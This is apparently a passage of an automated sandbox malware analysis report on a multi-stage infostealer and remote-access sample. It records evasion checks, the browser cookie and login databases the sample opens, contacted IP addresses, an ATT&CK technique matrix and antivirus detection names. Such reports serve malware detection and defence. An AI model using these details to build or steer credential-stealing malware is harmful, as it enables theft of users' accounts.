                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E8CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,1_2_00E8CBEA
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: MSASCui.exe
                    Source: RzAAR0y.exe, 0000000B.00000002.4666221685.000001AC38F79000.00000004.00000020.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4744725206.000000001BF35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: procexp.exe
                    Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 9.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.file.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2589474879.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2182621065.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: Yara matchFile source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RzAAR0y.exe PID: 6860, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: Yara matchFile source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RzAAR0y.exe PID: 6860, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0049EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,9_2_0049EC48
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0049DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,9_2_0049DF51
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts121
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    212
                    Process Injection
                    11
                    Deobfuscate/Decode Files or Information
                    LSASS Memory2
                    File and Directory Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter
                    21
                    Scheduled Task/Job
                    21
                    Scheduled Task/Job
                    14
                    Obfuscated Files or Information
                    Security Account Manager246
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Clipboard Data
                    1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts21
                    Scheduled Task/Job
                    121
                    Registry Run Keys / Startup Folder
                    121
                    Registry Run Keys / Startup Folder
                    13
                    Software Packing
                    NTDS971
                    Security Software Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets3
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials371
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                    Masquerading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry
                    Proc Filesystem11
                    Remote System Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                    Virtualization/Sandbox Evasion
                    /etc/passwd and /etc/shadow1
                    System Network Configuration Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579159 Sample: file.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 144 Found malware configuration 2->144 146 Malicious sample detected (through community Yara rule) 2->146 148 Antivirus detection for dropped file 2->148 150 21 other signatures 2->150 10 skotes.exe 4 76 2->10         started        15 file.exe 5 2->15         started        17 Intel_PTT_EK_Recertification.exe 2->17         started        process3 dnsIp4 128 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 10->128 130 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->130 132 2 other IPs or domains 10->132 100 C:\Users\user\AppData\...\36d93f3c0c.exe, PE32 10->100 dropped 102 C:\Users\user\AppData\...\2002c77d6d.exe, PE32 10->102 dropped 104 C:\Users\user\AppData\...\d44a5c682a.exe, PE32 10->104 dropped 110 32 other malicious files 10->110 dropped 184 Creates multiple autostart registry keys 10->184 186 Hides threads from debuggers 10->186 188 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->188 190 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->190 19 vQeyqr1.exe 14 10->19         started        24 950932ab59.exe 10->24         started        26 22b0b7688f.exe 10->26         started        30 4 other processes 10->30 106 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->106 dropped 108 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->108 dropped 192 Detected unpacking (changes PE section rights) 15->192 194 Tries to evade debugger and weak emulator (self modifying code) 15->194 196 Tries to detect virtualization through RDTSC time measurements 15->196 28 skotes.exe 15->28         started        198 Injects code into the Windows Explorer (explorer.exe) 17->198 200 Modifies the context of a thread in another process (thread injection) 17->200 file5 signatures6 process7 dnsIp8 112 208.95.112.1 TUT-ASUS United States 19->112 114 149.154.167.220 TELEGRAMRU United Kingdom 19->114 116 213.152.176.135 GLOBALLAYERNL Netherlands 19->116 88 C:\Users\user\AppData\Roaming\XClient.exe, PE32 19->88 dropped 158 Antivirus detection for dropped file 19->158 160 Protects its processes via BreakOnTermination flag 19->160 162 Machine Learning detection for dropped file 19->162 178 4 other signatures 19->178 32 powershell.exe 19->32         started        35 powershell.exe 19->35         started        118 104.21.21.99 CLOUDFLARENETUS United States 24->118 164 Multi AV Scanner detection for dropped file 24->164 166 Detected unpacking (changes PE section rights) 24->166 168 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->168 170 LummaC encrypted strings found 24->170 120 185.121.15.192 REDSERVICIOES Spain 26->120 124 2 other IPs or domains 26->124 90 C:\Users\user\AppData\...\service123.exe, PE32 26->90 dropped 92 C:\Users\user\...\UKzjyWlrjRLOjKNNlNHI.dll, PE32 26->92 dropped 180 3 other signatures 26->180 172 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 28->172 182 2 other signatures 28->182 122 45.200.149.15 Africa-on-Cloud-ASZA Seychelles 30->122 94 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 30->94 dropped 96 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 30->96 dropped 174 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->174 176 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 30->176 37 cmd.exe 30->37         started        39 cmd.exe 30->39         started        42 WerFault.exe 30->42         started        file9 signatures10 process11 dnsIp12 136 Uses ping.exe to check the status of other devices and networks 32->136 138 Loading BitLocker PowerShell Module 32->138 45 conhost.exe 32->45         started        47 conhost.exe 35->47         started        140 Uses cmd line tools excessively to alter registry or file data 37->140 49 in.exe 37->49         started        53 7z.exe 37->53         started        55 conhost.exe 37->55         started        63 9 other processes 37->63 98 C:\Users\user\AppData\Local\Temp\...\Dry.com, PE32 39->98 dropped 142 Drops PE files with a suspicious file extension 39->142 57 conhost.exe 39->57         started        59 tasklist.exe 39->59         started        61 findstr.exe 39->61         started        134 52.168.117.173 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 42->134 file13 signatures14 process15 file16 84 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 49->84 dropped 152 Suspicious powershell command line found 49->152 154 Uses cmd line tools excessively to alter registry or file data 49->154 156 Uses schtasks.exe or at.exe to add and modify task schedules 49->156 65 powershell.exe 49->65         started        67 attrib.exe 49->67         started        69 attrib.exe 49->69         started        71 schtasks.exe 49->71         started        86 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 53->86 dropped signatures17 process18 process19 73 PING.EXE 65->73         started        76 conhost.exe 65->76         started        78 conhost.exe 67->78         started        80 conhost.exe 69->80         started        82 conhost.exe 71->82         started        dnsIp20 126 127.0.0.1 unknown unknown 73->126

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe53%ReversingLabsWin32.Infostealer.Tinba
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe100%AviraHEUR/AGEN.1313061
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe100%AviraHEUR/AGEN.1320706
                    C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe100%AviraHEUR/AGEN.1313061
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe87%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe28%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe34%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe11%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe68%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe58%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe87%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe11%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe58%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe68%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\AppData\Local\Temp\1018906001\003.exe34%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    C:\Users\user\AppData\Local\Temp\245347\Dry.com0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Infostealer.Tinba
                    C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
